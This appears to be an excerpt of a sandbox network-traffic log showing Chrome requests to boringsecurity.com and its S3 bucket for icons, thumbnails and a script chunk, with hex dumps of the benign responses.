                                                                          Data Ascii: 3a,-K~)0jgG>1?u!Q1Aq?%QN,wW"!1AQaq?HX*1v!Q{{|8roCmA"


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          187192.168.2.54992475.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC365OUTGET /images/twitter_dark.svg HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:02 UTC393INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 31 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 32 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 30 32 32 61 35 37 65 62 32 38 33 35 32 37 34 37 31 65 30 38 37 65 31 32 65 62 33 36 30
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 1Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 1150Content-Type: image/svg+xmlDate: Sun, 10 Dec 2023 16:45:02 GMTEtag: "022a57eb283527471e087e12eb360
                                                                          2023-12-10 16:45:02 UTC793INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 20 32 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 32 34 20 32 2e 36 36 35 36 33 43 32 33 2e 30 39 39 37 20 33 2e 30 35 36 38 31 20 32 32 2e 31 34 37 32 20 33 2e 33 31 34 35 32 20 32 31 2e 31 37 32 35 20 33 2e 34 33 30 36 33 43 32 32 2e 31 39 36 38 20 32 2e 38 33 30 38 32 20 32 32 2e 39 36 37 32 20 31 2e 38 37 37 39 32 20 32 33 2e 33 33 39 20 30 2e 37 35 30 36 33 33 43 32 32 2e 33 37 30 35 20 31 2e 33 31 36 39 33 20 32 31 2e 33 31 32 38 20 31 2e 37 31 34 32 37 20 32 30 2e 32 31 31 20 31 2e 39
                                                                          Data Ascii: <svg width="24" height="20" viewBox="0 0 24 20" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M24 2.66563C23.0997 3.05681 22.1472 3.31452 21.1725 3.43063C22.1968 2.83082 22.9672 1.87792 23.339 0.750633C22.3705 1.31693 21.3128 1.71427 20.211 1.9
                                                                          2023-12-10 16:45:02 UTC357INData Raw: 32 2e 30 39 31 20 32 2e 36 38 38 35 20 31 32 2e 30 33 30 36 43 33 2e 33 31 34 20 31 33 2e 39 35 35 36 20 35 2e 31 33 34 35 20 31 35 2e 33 35 35 36 20 37 2e 32 39 31 20 31 35 2e 33 39 35 36 43 35 2e 35 33 38 36 39 20 31 36 2e 37 34 36 31 20 33 2e 33 38 37 33 31 20 31 37 2e 34 37 36 20 31 2e 31 37 35 20 31 37 2e 34 37 30 36 43 30 2e 37 38 32 33 30 39 20 31 37 2e 34 37 20 30 2e 33 38 39 39 38 33 20 31 37 2e 34 34 36 37 20 30 20 31 37 2e 34 30 30 36 43 32 2e 32 35 30 35 39 20 31 38 2e 38 33 37 37 20 34 2e 38 36 36 37 32 20 31 39 2e 35 39 37 39 20 37 2e 35 33 37 20 31 39 2e 35 39 30 36 43 31 36 2e 36 30 35 20 31 39 2e 35 39 30 36 20 32 31 2e 35 35 39 20 31 32 2e 32 30 35 36 20 32 31 2e 35 35 39 20 35 2e 38 30 30 36 33 43 32 31 2e 35 35 39 20 35 2e 35 39 30 36
                                                                          Data Ascii: 2.091 2.6885 12.0306C3.314 13.9556 5.1345 15.3556 7.291 15.3956C5.53869 16.7461 3.38731 17.476 1.175 17.4706C0.782309 17.47 0.389983 17.4467 0 17.4006C2.25059 18.8377 4.86672 19.5979 7.537 19.5906C16.605 19.5906 21.559 12.2056 21.559 5.80063C21.559 5.5906


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          188192.168.2.5499193.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:01 UTC639OUTGET /thumbnail_Jons_Doodley_Doo_9e4a536842.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:02 UTC447INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 53 7a 76 7a 6e 38 70 41 71 2f 69 56 71 67 54 7a 75 78 32 54 33 44 71 50 52 2f 53 4d 51 48 49 48 73 64 37 6f 59 47 30 33 73 70 70 57 67 50 6d 75 64 32 59 76 4a 48 77 55 2b 44 4a 2b 70 37 57 7a 71 5a 33 35 2f 6f 30 70 6b 6d 67 68 33 77 7a 57 51 52 6e 36 30 4a 39 47 64 32 56 45 4c 41 34 78 33 66 38 33 4f 47 47 78 37 30 45 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 5a 5a 34 5a 31 32 5a 4e 48 30 53 53 39 47 45 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 30 20 4f 63 74 20 32 30 32 32 20 31 31 3a 34 30 3a 34 32 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: Szvzn8pAq/iVqgTzux2T3DqPR/SMQHIHsd7oYG03sppWgPmud2YvJHwU+DJ+p7WzqZ35/o0pkmgh3wzWQRn60J9Gd2VELA4x3f83OGGx70E=x-amz-request-id: 8ZZ4Z12ZNH0SS9GEDate: Sun, 10 Dec 2023 16:45:03 GMTLast-Modified: Mon, 10 Oct 2022 11:40:42 GM
                                                                          2023-12-10 16:45:02 UTC13664INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 02 00 00 00 05 da 55 1a 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 5d 05 54 54 5b 17 be 34 48 88 85 8a d8 89 a2 98 28 76 77 77 b7 d8 dd 4a 37 76 3d c5 16 c4 4e 18 86 9c 9e a1 19 86 01 04 a4 24 44 51 30 51 89 89 f3 af 7d 0f f2 78 28 3e c4 81 19 df ef 5d 67 bd c5 c3 cb 70 39 df dd fb ec f3 ed 6f ef 43 84 87 a3 3f 23 fc bf 35 09 44 48 08 fa 33 42 fe 5b 93 f0 07 54 24 77 0c fe 80 2a ff 29 0b 51 f8 f1 c7 52 91 dc 31 f8 03 aa fc a7 2c 44 e1 c7 1f 4b 45 72 c7 e0 0f a8 f2 9f b2 10 85 1f 7f 2c 15 c9 1d 83 3f a0 ca 7f ca 42 14 7e fc b1 54 24 77 0c fe 80 2a ff 29 0b 51 f8 f1 c7 52 91 dc 31 f8 03 aa fc a7 2c 44 e1 c7 1f 4b 45 72 c7 e0 0f a8
                                                                          Data Ascii: PNGIHDRUpHYs IDATx]TT[4H(vwwJ7v=N$DQ0Q}x(>]gp9oC?#5DH3B[T$w*)QR1,DKEr,?B~T$w*)QR1,DKEr


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          189192.168.2.5499213.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC629OUTGET /thumbnail_kfxape_034a85ee89.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:02 UTC447INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 4a 38 7a 44 48 62 4a 49 33 69 68 55 2b 6f 63 77 65 42 35 56 56 6a 56 63 2f 61 35 4e 33 51 32 68 2f 4d 6f 38 30 33 65 50 6a 47 33 39 4f 2f 76 37 44 6d 50 56 69 68 50 49 47 6a 42 56 49 65 79 55 59 2f 71 32 63 4b 4f 4b 36 71 62 53 67 4c 33 77 50 45 65 63 30 50 6f 53 6a 6f 65 74 50 6c 69 33 58 78 4c 5a 34 54 41 4b 54 71 55 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 5a 5a 41 56 31 42 47 5a 4a 30 56 36 50 39 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 32 34 20 4f 63 74 20 32 30 32 32 20 30 39 3a 35 36 3a 35 30 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: J8zDHbJI3ihU+ocweB5VVjVc/a5N3Q2h/Mo803ePjG39O/v7DmPVihPIGjBVIeyUY/q2cKOK6qbSgL3wPEec0PoSjoetPli3XxLZ4TAKTqU=x-amz-request-id: 8ZZAV1BGZJ0V6P90Date: Sun, 10 Dec 2023 16:45:03 GMTLast-Modified: Mon, 24 Oct 2022 09:56:50 GM
                                                                          2023-12-10 16:45:02 UTC8462INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec 9d 77 58 93 d7 db c7 69 6d dd b2 f7 26 6c 92 b0 f7 de 7b ef bd 37 82 28 68 b5 5a 57 eb 6e 5d 55 14 65 b8 b7 dd 6a 6b ab b5 b6 8e 3a aa ad 76 6f fb 76 57 41 b2 81 9c fb bd ee 93 3c 18 10 b5 f3 27 28 7f 9c 2b 40 20 c0 f3 7c f2 bd e7 b9 8f d2 c6 06 bb 51 9f 9f cc 56 b2 3e f1 fc b8 2b 9b bd a6 7e d7 ec fc c1 2f 1b b8 82 eb 4d ec 9e eb 4d 9c 91 35 72 0d 7a fe c6 35 e8 fd b5 89 cb ff ae d9 e5 f2 87 2d de d3 46 bf b6 71 cc 17 6f a5 2a ad 9f 6a 37 4a e9 ca bb f9 4a cd 7b 4a f5 bf dd e4 7a f6 c6 06 0e dc 6c 62 43 c7 06 5c 1c f9 e3 c8 1a b9 06 ec bf 75 0d 6e 36 d9 01 32 f5
                                                                          Data Ascii: PNGIHDRMpHYs IDATxwXim&l{7(hZWn]Uejk:vovWA<'(+@ |QV>+~/MM5rz5-Fqo*j7JJ{JzlbC\un62
                                                                          2023-12-10 16:45:02 UTC12504INData Raw: b5 8a 8c 1e 3b 01 2a 73 a3 f9 e8 36 7c 72 6c 23 cc aa 49 a7 ff 2f 2a ff 27 c7 36 f6 04 3b 9b 76 97 05 1a 43 49 10 0b 02 6c 55 84 3f af b1 ed 96 b5 e0 8f 94 b6 6e 53 38 ba a7 74 13 17 2e 3d 6d 29 08 b2 d3 90 a0 e9 c3 62 bd af 95 3a 24 7a 9a f2 3e 3d de dc 23 f7 df fa 4c 2a 46 66 98 7f 7b ba 21 8f 2a 19 f3 75 04 8d 2e 39 78 18 b1 7e f5 6e 1b 64 86 39 91 22 5f 43 f4 0d 15 14 ce 8c 02 e7 67 a9 da 13 e2 61 c3 cf 4a 08 c2 a4 30 18 18 ea 91 e0 78 7f 42 4b 4c d5 e9 04 23 d5 fc da 2c c8 ae 4e 83 65 4d cf c1 b1 33 e7 e1 d5 e3 ef c0 81 23 6f 76 6f de b9 57 34 79 fa 2c b1 ae ae 0e 9f 63 a6 46 dc ed 0c 20 21 c0 96 54 a4 7a 91 9a 2c 7f 52 96 e6 4f 6a b2 43 c9 e4 dc 70 92 16 ed 43 52 22 dc 60 7a 71 24 c4 f8 d9 81 95 b1 96 c4 c9 de 52 18 10 e4 da e5 19 e0 ca 73 f4 73 10
                                                                          Data Ascii: ;*s6|rl#I/*'6;vCIlU?nS8t.=m)b:$z>=#L*Ff{!*u.9x~nd9"_CgaJ0xBKL#,NeM3#ovoW4y,cF !Tz,ROjCpCR"`zq$Rss


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          190192.168.2.54992252.217.229.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC391OUTGET /thumbnail_baebee_15f9684169.jpg HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:02 UTC415INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 41 2b 57 64 4d 51 52 31 42 54 57 7a 6d 51 4a 74 44 63 68 6e 6b 58 6a 2b 6e 4a 35 4e 69 6e 66 6a 4e 61 4f 31 31 62 64 4b 38 51 58 49 56 5a 56 55 55 51 31 77 2b 6b 79 6f 62 6c 4c 6c 4e 44 73 62 61 56 62 34 77 62 41 36 41 6f 73 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 5a 5a 42 45 4a 51 37 59 42 4e 4a 51 52 4b 59 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 30 32 20 4d 61 79 20 32 30 32 33 20 30 38 3a 30 39 3a 32 37 20 47 4d 54 0d 0a 45 54 61 67 3a 20 22 39 34 63 39 30 64 32 38 30 35 34 31 39 32 30 35 62 65 62 36 33 35
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: A+WdMQR1BTWzmQJtDchnkXj+nJ5NinfjNaO11bdK8QXIVZVUUQ1w+kyoblLlNDsbaVb4wbA6Aos=x-amz-request-id: 8ZZBEJQ7YBNJQRKYDate: Sun, 10 Dec 2023 16:45:03 GMTLast-Modified: Tue, 02 May 2023 08:09:27 GMTETag: "94c90d2805419205beb635
                                                                          2023-12-10 16:45:02 UTC6168INData Raw: ff d8 ff db 00 43 00 06 04 05 06 05 04 06 06 05 06 07 07 06 08 0a 10 0a 0a 09 09 0a 14 0e 0f 0c 10 17 14 18 18 17 14 16 16 1a 1d 25 1f 1a 1b 23 1c 16 16 20 2c 20 23 26 27 29 2a 29 19 1f 2d 30 2d 28 30 25 28 29 28 ff db 00 43 01 07 07 07 0a 08 0a 13 0a 0a 13 28 1a 16 1a 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 ff c0 00 11 08 00 9c 00 9c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 04 02 03 05 06 07 01 08 00 ff c4 00 4a 10 00 01 03 03 03 01 05 04 02 0d 0a 05 05 00 00 00 01 02 03 04 00 05 11 06 12 21 31 07 13 22 41 51 14 32 61 71 23 62 08 15 16 17 35 52 81 91 92 a1 b1 b2 d1 24 34 42 53 54 72 73 a2 c1 c2
                                                                          Data Ascii: C%# , #&')*)-0-(0%()(C((((((((((((((((((((((((((((((((((((((((((((((((((("J!1"AQ2aq#b5R$4BSTrs


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          191192.168.2.5499233.5.25.1214435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC627OUTGET /thumbnail_kupi_5990bb8872.png HTTP/1.1
                                                                          Host: boring-security-cms.s3.amazonaws.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:02 UTC447INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 78 2d 61 6d 7a 2d 69 64 2d 32 3a 20 31 67 64 49 66 62 30 66 47 56 73 65 48 2b 53 72 36 6f 35 7a 67 57 30 32 66 62 46 4b 42 4e 47 42 49 6e 57 67 4c 6c 62 2f 36 4e 45 4b 78 55 39 43 74 59 4e 75 63 6a 42 41 34 66 55 73 55 6a 63 38 4f 32 43 6a 33 51 53 79 59 33 69 43 52 4f 41 42 31 45 68 33 4d 48 30 67 4d 69 46 2b 2f 6c 67 31 74 4b 4b 78 4c 7a 61 63 59 79 6b 3d 0d 0a 78 2d 61 6d 7a 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 38 5a 5a 32 30 32 35 4a 44 42 48 45 5a 44 57 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 33 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 32 30 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 33 35 3a 30 33 20 47 4d
                                                                          Data Ascii: HTTP/1.1 200 OKx-amz-id-2: 1gdIfb0fGVseH+Sr6o5zgW02fbFKBNGBInWgLlb/6NEKxU9CtYNucjBA4fUsUjc8O2Cj3QSyY3iCROAB1Eh3MH0gMiF+/lg1tKKxLzacYyk=x-amz-request-id: 8ZZ2025JDBHEZDW8Date: Sun, 10 Dec 2023 16:45:03 GMTLast-Modified: Mon, 20 Nov 2023 06:35:03 GM
                                                                          2023-12-10 16:45:02 UTC1509INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9c 00 00 00 9c 08 06 00 00 00 8a b8 c2 4d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 07 7c 55 e5 dd c7 6f 06 10 42 12 32 d8 43 48 6e 6e 36 88 88 a3 2d 2d 2e 0a f8 6a ad 32 84 b0 97 58 2b 43 0b 24 8c 6c 08 19 40 06 ca 06 65 25 0c 07 84 e1 44 db 3a 6b ed 5b b7 ed 5b ad a0 42 85 2a 4b 05 57 f2 7b 3f ff e7 9c 73 ef 39 27 67 3c 67 dc 80 7d df f8 f9 79 03 dc 71 72 ce 37 bf ff ff ff fc 9f e7 39 9e b4 fb b6 22 ed 7e 49 db 90 f6 3b 95 e6 ca 34 2f a0 d4 f9 72 6d 47 6a 8e 4c b9 1a 5a 20 d3 42 41 29 7e ed 40 ca 22 95 16 6b 28 4f 47 f9 82 7c 5a 2a a8 b3 ae 42 97 64 e7 b3 f3 9b ff 0c d2 cf a7 fb f3 6b 9d 2b f5 f9 a4 73 2c 3b e7 ec 1a c8 af 89 d6 35 93 5f d3
                                                                          Data Ascii: PNGIHDRMpHYs IDATx|UoB2CHnn6--.j2X+C$l@e%D:k[[B*KW{?s9'g<g}yqr79"~I;4/rmGjLZ BA)~@"k(OG|Z*Bdk+s,;5_
                                                                          2023-12-10 16:45:02 UTC11966INData Raw: b3 4c 34 f4 ef 89 c7 ae ea 8d c7 07 90 7a e1 b1 ab 12 71 b0 5f b7 00 64 32 e0 08 b6 0f 32 a2 70 84 00 50 e9 28 83 2a 78 0e f7 71 46 3b 7c 9a de 16 ff e8 13 87 b7 fa 77 c1 db 57 74 66 a2 ef df eb d7 11 2f fe c4 8b 2b 8a 37 32 b7 33 06 ef 12 82 ce 24 9f f3 58 0e a5 2d 01 9b 05 57 f3 03 57 b9 87 39 5a c3 95 3d f1 c7 f4 18 3c 97 19 87 e7 25 65 c4 e2 70 56 7c 20 67 93 01 47 6e 46 b0 7d 9a 1e c9 e0 52 4b 00 4d 04 85 07 38 cd e7 68 03 f7 49 7a 00 ba 7f a5 b6 c1 f1 34 41 c7 d2 22 70 32 25 9c 41 47 4e d7 ab 52 03 38 33 e8 4a 83 0b 9d e5 7c 4e 01 9c ad 50 1a 5c d8 b4 c6 d4 9a 9d f0 72 41 c9 e5 02 70 97 17 6f 64 6e 46 b0 3d dd a7 63 b3 bc 4c cb e1 08 b8 8f 54 4e 26 d7 27 56 42 6a ba d1 73 9a 87 54 f9 fb 93 9b 4a 8f 47 33 a2 18 74 e4 74 fd 8b 45 e0 ca eb fd 3f af 19
                                                                          Data Ascii: L4zq_d22pP(*xqF;|wWtf/+723$X-WW9Z=<%epV| gGnF}RKM8hIz4A"p2%AGNR83J|NP\rApodnF=cLTN&'VBjsTJG3ttE?


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          192192.168.2.54992975.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC768OUTGET /_next/static/chunks/98-5331d5e48bc919a7.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Purpose: prefetch
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          If-None-Match: "c8d2668e8669284b4e536b5ba55392af-ssl"
                                                                          2023-12-10 16:45:02 UTC322INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 34 20 4e 6f 74 20 4d 6f 64 69 66 69 65 64 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 30 32 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 63 38 64 32 36 36 38 65 38 36 36 39 32 38 34 62 34 65 35 33 36 62 35 62 61 35 35 33 39 32 61 66 2d 73 73 6c 22 0d 0a 53 65 72 76 65 72 3a 20 4e 65 74 6c 69 66 79 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 0d
                                                                          Data Ascii: HTTP/1.1 304 Not ModifiedCache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitDate: Sun, 10 Dec 2023 16:45:02 GMTEtag: "c8d2668e8669284b4e536b5ba55392af-ssl"Server: NetlifyStrict-Transport-Security: max-age=31536000


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          193192.168.2.54993075.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:02 UTC536OUTGET /_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_quit_b3e92694b1.png&w=48&q=75 HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
